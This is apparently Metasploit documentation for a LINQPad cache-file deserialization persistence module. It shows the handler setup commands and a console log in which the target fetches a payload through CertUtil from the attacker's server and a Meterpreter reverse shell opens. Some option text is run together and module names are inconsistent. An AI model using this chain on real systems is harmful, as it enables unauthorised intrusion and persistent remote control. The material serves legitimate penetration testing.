documentation/modules/exploit/windows/persistence/linqpad_deserialization.md
LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from here.
use windows/local/linqpad_deserializationset payload cmd/windows/generic - and corresponding parameterssession, cache_path, linqpad_path, cleanupThe parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.3.7
msf exploit(multi/handler) > set LPORT 4545
msf exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/linqpad_deserialization_persistence) >
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /LCG8z8xZZXJnz_uKNIZRPw
[*] Started reverse TCP handler on 192.168.3.7:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. LINPad and vulnerable cache file present, target possibly exploitable
[*] Create deserialization payload
[*] Saving the original content
[*] Saved at: /home/ms/.msf4/loot/20251027153340_default_10.5.132.148_CUsersmsfuser_949460.txt
[*] Overwriting file
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/WIN10_1909_BE09_20251027.3341/WIN10_1909_BE09_20251027.3341.rc
[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
[*] Sending payload to 10.5.132.148 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.148 requested /LCG8z8xZZXJnz_uKNIZRPw
[*] Sending payload to 10.5.132.148 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 10.5.132.148
[*] Meterpreter session 2 opened (192.168.3.7:4545 -> 10.5.132.148:50045) at 2025-10-27 15:33:53 +0100